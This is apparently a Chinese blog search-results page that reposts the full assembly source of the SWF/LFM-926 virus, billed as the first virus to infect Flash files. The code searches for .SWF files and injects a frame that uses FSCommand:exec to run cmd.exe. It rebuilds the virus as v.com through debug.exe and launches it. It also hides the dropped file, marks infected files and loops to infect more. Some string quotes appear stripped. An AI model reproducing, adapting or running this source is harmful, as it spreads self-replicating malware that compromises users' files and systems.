搜索到
3
篇与
的结果
-
第一只感染flash的病毒源代码 代码如下:SWF/LFM-926 Virus: ; ------------------ ; Description: WinNT/XP Virus dropper for Flash .SWF files! ; Masm Version 6.11: ML.EXE SWF.ASM ; Virus Size: 926 bytes ; Infection Size: 3247 bytes. ; Last Edit: 01/08/2002 ; --------------------------------- Begin Source Code ------------------------------------ .286 .model tiny .code org 100h Entry: jmp Start VIR_SIZE equ Virus_End-Entry DTA db 128 dup(0) ; Offset DTA+30 = filename HANDLE dw ? ; Handle to host file PTR1 dd 0 ; Segment address of the created memory block PATH db "*.SWF",0 ; File mask BINARY db "v.com",0 ; Binary code HEX db "0123456789ABCDEF" ; Binary to hex ; Flash header block. ; ------------------- SIGN_FW dw ? ; SWF file format SIGN_S db ? VERSION_NUM db ? FILE_LENGTH dw ? dw ? STATIC_HDR_SIZE equ $-SIGN_FW RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;( RECT_BUF_SIZE equ $-RECT_BUF HDR_SIZE dw ? ; Holds the true header size! ; Start of Viral Frame 0. ; ----------------------- Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG] dw 0 db 083h ; ActionGetUrl Tag ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE) db FSCommand:exec db 000h db cmd.exe db 009h ; chr(9) is Flash code for a space character. db /c db 009h db echo db 009h db Loading.Flash.Movie... db & db (echo db 009h db n db 009h db v.com&echo db 009h db a db 009h db 100& Drop_BEGIN_SIZE equ $-Drop_BEGIN Drop_MIDDLE db echo db 009h db db db 009h db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes. db & Drop_MIDDLE_SIZE equ $-Drop_MIDDLE Drop_END db &echo.&echo db 009h db rcx&echo db 009h db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. db &echo db 009h db w&echo db 009h db q)|debug.exe>nul&start db 009h db /b db 009h db v.com db 000h ; StringEnd Tag Drop_END_SIZE equ $-Drop_END ; End of Viral Frame 0. ; --------------------- END_TAG db 001h ; Action code 0x01 = tagshowframe Tag Start: mov ax,(VIR_SIZE+0fh) shr ax,4 shl ax,1 mov bx,ax ; Allocate (VirusSize*2) mov ah,4ah int 21h ; Resize block jc ExProg mov dx,offset DTA ; Set DTA operation mov ah,1ah int 21h mov cx,07h mov dx,offset PATH mov ah,4eh ; FindFirst int 21h jc ExProg jmp Infect Cycle: mov dx,offset PATH mov ah,4fh ; FindNext int 21h jc ExProg jmp Infect ExProg: mov ax,4301h ; Hide v.com mov cx,02h mov dx,offset BINARY int 21h mov ax,4c00h ; End program int 21h Infect: mov byte ptr DTA[30+12],$ mov dx,offset (DTA+30) mov ax,3d02h ; Open host file int 21h jc ExProg mov [HANDLE],ax ; Save file handle mov ax,3f00h ; Read file Header mov dx,offset SIGN_FW mov bx,[HANDLE] mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE) int 21h jc ExProg cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file. jne Cycle ; Try another file ... cmp byte ptr SIGN_S,S jne Cycle cmp byte ptr VERSION_NUM,099h ; Already infected? je Cycle mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. xor di,di ; Seems to always exist directly after the header. next: cmp byte ptr RECT_BUF[di],043h jne not_found cmp byte ptr RECT_BUF[di+1],002h jne not_found jmp found not_found: inc di loop next jmp Cycle found: mov word ptr HDR_SIZE,STATIC_HDR_SIZE add word ptr HDR_SIZE,di ; Compute the header size mov ax,4200h ; Reset file ptr right after Flash header xor cx,cx mov dx,[HDR_SIZE] int 21h jc ExProg push bx mov ax,word ptr FILE_LENGTH add ax,15 shr ax,4 mov bx,ax mov ah,48h ; Allocate memory for target host file int 21h pop bx jc ExProg mov word ptr PTR1[2],ax ; Save pointer to allocated block mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ah,3fh ; Read host file into memory block push ds lds dx,[PTR1] int 21h pop ds jc ExProg mov ax,4200h ; Reset file ptr to the middle code section xor cx,cx mov dx,[HDR_SIZE] add dx,Drop_BEGIN_SIZE int 21h jc ExProg ; ; The following code is a key technique. It simply converts the ; virus from binary to hex characters and then inserts them into the host ; using a standard format that DEBUG.EXE expects! Flash only really ; allows plain text, so this satisfies that condition. ; mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE) push bx mov cx,VIR_SIZE xor si,si xor di,di ToHex: mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber mov al,byte ptr Entry[si] mov ah,al and al,00001111y xlat mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al shr ax,12 xlat mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al inc si inc di inc di inc di mov ax,si mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line. div bl or ah,ah jnz cont push cx xor di,di add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE mov bx,[HANDLE] ; Write hex dump entry XX,...,XX mov dx,offset Drop_MIDDLE mov cx,Drop_MIDDLE_SIZE mov ax,4000h int 21h jc ExProg pop cx cont: loop ToHex pop bx or di,di jz no_remainder mov dx,offset Drop_MIDDLE mov cx,di add cx,7 ; STATIC_HDR_SIZE-1 add word ptr ACTION_LENGTH,cx mov ax,4000h ; Write remainder hex dump entry XX,...,XX int 21h jc ExProg no_remainder: mov dx,offset Drop_END mov cx,Drop_END_SIZE+1 mov ax,4000h ; Write end code and end of frame tag(01) into host int 21h jc ExProg mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ax,4000h ; Write host code directly after viral code. push ds lds dx,[PTR1] int 21h pop ds jc ExProg ; Patch the header with new viral values. mov cx,word ptr ACTION_LENGTH add cx,4 mov word ptr TAG_LENGTH,cx add cx,6 add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6) ; Set infection marker mov byte ptr VERSION_NUM,099h mov di,[HDR_SIZE] inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 mov ax,4200h ; Re-wind to start of file xor cx,cx xor dx,dx int 21h jc ExProg mov dx,offset SIGN_FW mov cx,[HDR_SIZE] mov ax,4000h ; Write updated viral header int 21h jc ExProg mov dx,offset Drop_BEGIN mov cx,Drop_BEGIN_SIZE mov ax,4000h ; Write begin code into host int 21h jc ExProg mov ah,49h ; Free memory block mov es,word ptr PTR1[2] int 21h jc ExProg mov ax,3e00h ; Close file int 21h jc ExProg jmp Cycle ; DONE! Try to infect another. Virus_End: end Entry -
-
